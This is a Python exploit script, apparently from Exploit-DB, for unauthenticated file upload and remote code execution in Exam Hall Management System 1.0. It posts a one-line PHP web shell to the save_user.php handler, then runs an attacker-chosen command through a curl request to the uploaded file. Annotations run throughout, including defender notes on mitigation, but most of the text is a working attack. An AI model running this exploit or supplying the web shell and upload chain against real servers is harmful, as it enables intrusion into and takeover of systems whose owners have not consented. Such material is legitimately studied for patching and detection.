# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
# Exploit Author: Davide 'yth1n' Bianchin
# Contacts: davide dot bianchin at dedagroup dot it
# Original PoC: https://exploit-db.com/exploits/50103
# Date: 06.07.2021
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import os
import sys
import string
import random
import time
# Target installation: hostname and web-root sub-directory are placeholders
# (the CHANGETHIS markers); the URL points at the upload handler that the
# title describes as reachable without authentication.
host = 'localhost'  # CHANGETHIS
path = 'SourceCode'  # CHANGETHIS
url = f'http://{host}/{path}/pages/save_user.php'
def id_generator(size=6, chars=string.ascii_lowercase):
    """Return a random name of *size* characters drawn from *chars*, suffixed with ``.php``.

    Uses the non-cryptographic ``random`` module; the value is only a file name.
    """
    picks = [random.choice(chars) for _ in range(size)]
    return ''.join(picks) + '.php'
# Command-line handling: the single positional argument is the command string
# that reverse() below appends verbatim to a query string; '+' is advertised as
# the separator, presumably because it decodes to a space on the receiving end.
if len(sys.argv) == 1:
    print("#########")
    print("Usage: python3 examhallrce.py command")
    print("Usage: Use the char + to concatenate commands")
    print("Example: python3 examhallrce.py whoami")
    print("Example: python3 examhallrce.py ls+-la")
    print("#########")
    exit()  # NOTE(review): exit() is provided by the site module; sys.exit() is the portable form
# Random lowercase name with a .php extension, reused as the upload's file name.
filename = id_generator()
print("Generated "+filename+ " file..")
time.sleep(2)  # cosmetic pause only; nothing depends on the delay
print("Uploading file..")
time.sleep(2)
def reverse() -> None:
    """Upload a one-line PHP file via the save_user.php handler, then request it with ?cmd=.

    Defender notes grounded in this function: the POST carries no cookie or
    credential (only a Content-Type header), the uploaded part's file name and
    content type are entirely client-chosen, and the script expects the file to
    be served back from uploadImage/Profile/<name>.php. The observable chain is
    an unauthenticated POST to pages/save_user.php followed by a GET to
    uploadImage/Profile/*.php?cmd=...; validating the extension/type server-side
    and keeping uploads outside the web root would break that chain.
    """
    command = sys.argv[1]  # argv length was checked at module level before the call
    # 'btn_save' is presumably the form's submit-button field name; the 'image'
    # part is what the handler writes to disk, here with a .php name.
    multipart_data = MultipartEncoder({
        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
        'btn_save': ''
    })
    # The response is never inspected: the "Success" line below prints regardless of status.
    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})
    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+''
    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
    print("Success, file correctly uploaded at: " +endpoint+ "")
    time.sleep(1)
    print("Executing command in 1 seconds:\n")
    time.sleep(1)
    # NOTE(review): argv[1] is interpolated unquoted into a shell string, so any
    # shell metacharacters in it are interpreted by the local shell, not just sent.
    os.system("curl -X GET "+urlo+"")
# Runs the upload-then-request sequence at import time; there is no __main__ guard.
reverse()